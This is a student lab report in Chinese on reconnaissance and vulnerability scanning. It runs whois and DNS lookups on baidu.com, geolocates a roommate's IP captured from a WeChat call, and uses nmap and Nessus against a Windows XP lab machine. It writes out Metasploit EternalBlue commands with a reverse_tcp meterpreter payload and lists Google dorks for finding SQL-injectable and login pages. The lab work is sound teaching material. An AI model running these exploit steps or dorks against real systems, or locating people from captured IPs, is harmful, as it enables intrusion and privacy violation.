20222422 2024-2025-1 《网络与系统攻防技术》实验五实验报告

news/2024/11/30 20:18:29/文章来源:https://www.cnblogs.com/20222422tky/p/18575982

一、实验内容

(1)从www.besti.edu.cn、baidu.com、sina.com.cn中选择一个DNS域名进行查询,获取如下信息:

DNS注册人及联系方式

该域名对应IP地址

IP地址注册人及联系方式

IP地址所在国家、城市和具体地理位置

PS:使用whois、dig、nslookup、traceroute、以及各类在线和离线工具进行搜集信息(要求必须用WHOIS、dig、nslookup、traceroute、tracert以及在线工具)

(2)尝试获取BBS、论坛、QQ、MSN中某一好友的IP地址,并查询获取该好友所在的具体地理位置。

(3)使用nmap开源软件对靶机环境进行扫描,回答以下问题并给出操作命令。

靶机IP地址是否活跃

靶机开放了哪些TCP和UDP端口

靶机安装了什么操作系统,版本是多少

靶机上安装了哪些服务

(4)使用Nessus开源软件对靶机环境进行扫描,回答以下问题并给出操作命令。

靶机上开放了哪些端口

靶机各个端口上网络服务存在哪些安全漏洞

你认为如何攻陷靶机环境,以获得系统访问权

(5)通过搜索引擎搜索自己在网上的足迹,并确认自己是否有隐私和信息泄漏问题。并练习使用Google hack搜集技能完成搜索(至少10种搜索方法)

二、实验过程

(一)从www.besti.edu.cn、baidu.com、sina.com.cn中选择一个DNS域名进行查询,获取信息

选择的DNS域名:baidu.com

1、使用whois命令

whois baidu.com

image

image

获取信息如下:
DNS注册人:MarkMonitor Inc
DNS注册人联系方式:
(1)邮箱:abusecomplaints@markmonitor.com
(2)电话:+1.2086851750
IP地址所在国家:CN
城市:Beijing
具体地理位置:Beijing Baidu Netcom Science Technology Co., Ltd

2、使用nslookup命令

nslookup baidu.com

image

获取ip地址如下:
(1)39.156.66.10
(2)110.242.68.66

(1)使用whoise查询39.156.66.10
whois 39.156.66.10

image

获得信息:
IP注册人:haijun li
邮箱:hostmaster@chinamobile.com
地址: 29,Jinrong Ave, Xicheng district,beijing,100032
电话: +86 1052686688
还有其他信息

(2)使用whoise查询110.242.68.66
whois 110.242.68.66

image

获得信息:
IP注册人:Kong Lingfei
邮箱:konglf5@chinaunicom.cn
地址: 45, Guang An Street, Shi Jiazhuang City, HeBei Provin
电话: +86-311-86681601
还有其他信息

3、使用dig命令

dig baidu.com

image

可以看到同样获取了ip地址等信息,与之前获取的一致

4、使用traceroute命令

traceroute baidu.com

image

发现无法看到数据包到该网站所经过的路由的路径

5、使用tracert命令

该命令实在windows下使用的
tracert baidu.com

image

发现在抵达110.242.68.66之前经过了如上图的众多路由节点

6、使用在线网站查询

网址:https://uutool.cn/ip/

(1)查询39.156.66.10

image

(2)查询110.242.68.66
image

发现除了国家等地址,还有更加具体的经纬度信息和互联网服务提供商信息等

(二)尝试获取BBS、论坛、QQ、MSN中某一好友的IP地址,并查询获取该好友所在的具体地理位置。

(1)和舍友打微信电话并打开抓包

image

ip查询结果如下:

image

ip属地为北京市丰台区,与舍友位置一致

(三)使用nmap开源软件对靶机环境进行扫描,回答以下问题并给出操作命令

靶机:winxp
靶机ip:192.168.198.148

1、ping扫描

nmap -sn 192.168.198.0/24

image

通过扫描结果可知,靶机在线

2、靶机开放了哪些TCP和UDP端口

通过命令nmap -sT -sU -p- 192.168.198.148来对靶机TCP和UDP端口进行扫描

image

开放的端口有:
TCP:135,139,445
UDP:123,137,138,445,500,1027,1900,4500

3、靶机安装了什么操作系统,版本是多少

nmap -O 192.168.198.148

image

可以看出操作系统是Microsoft Windows XP SP2 或者SP3

4、靶机上安装了哪些服务

nmap -sV 192.168.198.148

image

可以看出靶机安装了msrpc(微软远程过程调用)、netbios-ssn(网络基本输入输出系统的会话服务)、microsoft-ds(微软网络目录服务)。

(四)使用Nessus开源软件对靶机环境进行扫描,回答以下问题并给出操作命令

1、下载nessus开源软件,过程参考:https://blog.csdn.net/m0_52985087/article/details/135170187
2、靶机上开放了哪些端口

靶机:winxp
靶机ip:192.168.198.148

点击右上角的new scan,选择host discovery

image

设置参数:

image

点击launch,开始扫描:

image

扫描结果如下:

image

发现开放了的端口有135,139,445

3、靶机各个端口上网络服务存在哪些安全漏洞

创建new scan,选择advanced scan,并设置参数:

image

扫描结果如下:

image

image

image

image

可以看出445端口的SMB/RPC服务存在MS09-001、MS08-067、MS17-010漏洞。

4、你认为如何攻陷靶机环境,以获得系统访问权

(1)MS09-001:

攻击者可以利用该漏洞,通过发送特制的SMB请求,在目标主机上执行任意代码。成功利用该漏洞后,攻击者可以获取到目标系统的完全控制权限。

(2)MS08-067:

攻击者可以通过发送精心构造的SMB请求,导致远程代码执行。该漏洞的利用可以让攻击者在目标系统上执行恶意代码,并可能进一步渗透网络。

(3)MS17-010:

该漏洞允许攻击者通过精心构造的SMB请求,发送恶意数据包到目标计算机,进而远程执行代码。攻击者可以利用该漏洞完全控制受害者系统。

(4)攻击步骤:

扫描目标主机的445端口,确认SMB服务是否开启。
nmap -p 445 --script smb-os-fingerprint <target_ip>

使用工具如Metasploit,检查目标系统是否易受MS09-001、MS08-067或MS17-010漏洞的攻击。
例如,使用Metasploit的auxiliary/scanner/smb/smb_ms17_010模块来检查MS17-010漏洞:
msfconsole

use auxiliary/scanner/smb/smb_ms17_010

set RHOSTS <target_ip>

run

如果目标存在漏洞,可以使用Metasploit等工具尝试利用该漏洞进行远程代码执行。例如,使用Metasploit的exploit/windows/smb/ms17_010_eternalblue模块来利用MS17-010漏洞:
msfconsole

use exploit/windows/smb/ms17_010_eternalblue

set RHOSTS <target_ip>

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST <your_ip>

run

(五)搜索测试

1、通过搜索引擎搜索自己在网上的足迹,并确认自己是否有隐私和信息泄漏问题

搜索姓名:

image

发现都是无关我的信息,没有泄露

搜索学号:

image

发现有之前写的博客园实验报告信息,没有消息泄露

搜索电话号码:

image

发现只有号码段所在地区,未泄露信息

搜索身份证号:

image

发现也没有泄露消息

2、练习使用Google hack搜集技能完成搜索(至少10种搜索方法)

(1)搜索网页标题
intitle: login

搜索标题中包含“login”的页面

image

(2)搜索特定的URL结构
inurl:"login" "admin"

查找URL中包含“login”和“admin”的页面

image

(3)搜索特定网站的内容
site:baidu.com "username"

查找baidu.com网站上包含“username”字样的页面

image

(4) 搜索特定子域名
site:baidu.com -www

搜索会列出baidu.com下所有的子域名,排除www子域

image

(5)查找密码保护页面
inurl:"password"

该搜索可以帮助你找到登录或密码验证页面,可能会暴露某些弱密码的提示。

image

(6)搜索特定文件类型
filetype:pdf "批发"

该搜索可以帮助你找到包含“批发”字样的PDF文件。

image

(7)查找可能包含sql注入的网址
inurl: .php?id=

image

(8)查找页面内容
intext: admin

查找包含“admin”这个词的页面内容

image

(9)查找相似页面
related:https://www.besti.edu.cn/

查找与https://www.besti.edu.cn/ 布局相似的页面

image

(10)查看指定地方的天气
weather:beijing

查看北京的天气

image

三、问题及解决方案

问题一:在安装nessus的时候一开始在kali上安装,发现注册的时候总是不成功

问题一解决:发现是kali硬盘空间不足了,有两种解决方案:一种是扩容kali空间,一种是在windows下使用nessus,我选择的是后者

问题二:使用tracert命令在kali运行时发现报错

问题二解决:发现tracert是windows下的命令,换windows的cmd下执行得以解决

四、学习感悟、思考等

本次实验让我深入了解了网络安全领域中的信息收集、漏洞扫描和渗透测试的基本方法与技巧。在实验过程中,我首先学习使用了whois、dig和nslookup等工具。使用nmap和Nessus对靶机环境的扫描让我实际感受到漏洞扫描的重要性。通过nmap,我成功识别了靶机的活跃性、开放端口、操作系统及安装服务;而通过Nessus,我发现了靶机上的潜在安全漏洞,这为渗透测试和防护措施提供了有力的依据。实验中也让我认识到,渗透测试不仅仅是技术问题,更需要对系统的全面理解和风险评估。通过Google Hacking技巧的练习,我学习到了如何使用特定的搜索语法来发现网络中的潜在隐私泄漏和信息暴露。这种技能对于信息收集和漏洞挖掘具有重要意义,但同样要注意合法使用,避免侵犯他人隐私。
本次实验不仅让我掌握了网络安全的工具和技术,还加强了对信息安全伦理的认识。

参考资料

  • [《CSDN在windows下安装nessus教程》] https://blog.csdn.net/m0_52985087/article/details/135170187

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/844248.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

安装扫描仪DS-410出现安装Desktop Experience提示

安装Epson Scan所需的某些模块没有安装。安装Desktop Experience之后安装Epson Scan。在Windows server 2012上安装扫描仪出现该错误,该错误为server系统需要桌面支持,默认Windows server 该功能是不安装的需要用户按需求安装。 安装windows server 2012 R2 安装桌面体验勾选…

2019-8-29-02-JS-DOM

图片轮播是Web开发中最常见的组件之一,这是一篇用原生JavaScript实现简单图片轮播的教程。 要实现图片轮播,首先我们要将图片轮播拆分为图片容器、图片、上一页按钮、下一页按钮、底部点选容器、底部点选按钮。 下面我们用HTML代码表示。 ... <div id="page">…

【朝花夕拾】蓝牙WiFi常识篇

一、蓝牙常识点 1、常见英文缩写缩写 英文全称 释义BLE Bluetooth Low Energy低功耗蓝牙BR Basic Rate基本速率,一般说的经典蓝牙就是指BR/EDREDR Enhanced Data Rate增强速率,BR的增强版,一般说的经典蓝牙就是指BR/EDRBluetooth SIG Bluetooth Special Interest Group蓝牙技…

Git入门图文教程(1.5W字40图)--深入浅出、图文并茂

原文:Git入门图文教程(1.5W字40图)🔥🔥--深入浅出、图文并茂 - 安木夕 - 博客园01、认识一下Git!—简介 Git是当前最先进、最主流的分布式版本控制系统,免费、开源!核心能力就是版本控制。再具体一点,就是面向代码文件的版本控制,代码的任何修改历史都会被记录管理起…

20222414 2024-2025-1 《网络与系统攻防技术》实验七实验报告

1.实验内容及要求 1.1本实践的目标理解常用网络欺诈背后的原理,以提高防范意识,并提出具体防范方法。具体实践有 (1)简单应用SET工具建立冒名网站 (2)ettercap DNS spoof (3)结合应用两种技术,用DNS spoof引导特定访问到冒名网站。 1.2本周学习内容 (1)web安全基础:…

硬盘的基本知识与选购指南

1、3.5和2.5英寸硬盘的英寸,不是指外壳的尺寸,而是硬盘盘片的直径尺寸。 无论是 2.5英寸的硬盘还是 3.5 英寸的硬盘,都是使用 SATA 接口。 1.1、3.5英寸 3.5 英寸的硬盘在 1984 年就已经诞生,直到在 1991 年出现首款容量为 1GB 的机械硬盘,3.5 英寸硬盘开始成为标准规格。…

《Django 5 By Example》阅读笔记:p455-p492

《Django 5 By Example》学习第 16 天,p455-p492 总结,总计 38 页。 一、技术总结 1.myshop (1)打折功能 使用折扣码实现,但是折扣码是手动生成的,感觉实际业务中应该不是这样的。 (2)推荐功能 使用 Redis 做缓存,结合商品的销量做推荐,算是一种普通的实现方案。 二、英语…

[ctf]跟着风二西复现NSSCTF流量题目

题目参考博客 https://blog.csdn.net/zerorzeror/article/details/135737476?spm=1001.2014.3001.5502 20241130 [GKCTF 2021]签到 解题过程 可以看到流量并不多,看到GET和POST里面有tmpshell 然后追踪HTTP流 可以看到初始的这一段字符,因为字符中字母最大的为f,无其他字符…

STM2F411智能手环设计

最近闲来无事就想制作一款智能手表,为此我直接从网上找到一个开源项目OV-Watch。这里我们就以这个开源项目为例,一步步就讲解,从最初的电路原理图绘制,到PCB打样焊接,到最后的程序编写烧录测试。 由于该开源项目包含了若干个版本,这里我们在复刻的时候以当前最新版本为例…

强烈推荐!终于找到了一个查看 dotnet 源码的便捷方法

强烈推荐!终于找到了一个查看 dotnet 源码的便捷方法 快把这个网站加入标签栏 “https://source.dot.net/” ​​ 为什么推荐由GitHub生成,由Roslyn提供支持。 不需要梯子,快速访问如何使用 1、查找类型和成员声明、文件和程序集:搜索内容 示例完整或部分类型或成员名称。字…

20222406 2024-2025-2 《网络与系统攻防技术》实验七实验报告

20222406 2024-2025-2 《网络与系统攻防技术》实验七实验报告 1.实验内容应用 SET 工具,通过多步操作建立冒名网站,获取登录信息。 利用 ettercap 实施 DNS spoof 攻击,篡改特定网站 IP。 结合两种技术,用 DNS spoof 引导访问至冒名网站。2.实验过程 2.1 简单应用SET工具建…

学期:2024-2025-1 学号:20241303 《计算机基础与程序设计》第10周学习总结

作业信息这个作业属于哪个课程 <班级的链接>(如2024-2025-1-计算机基础与程序设计)这个作业要求在哪里 <作业要求的链接>(如2024-2025-1计算机基础与程序设计第十周作业)这个作业的目标 <写上具体方面>计算机科学概论(第七版)第12,13,14章 并完成云班课…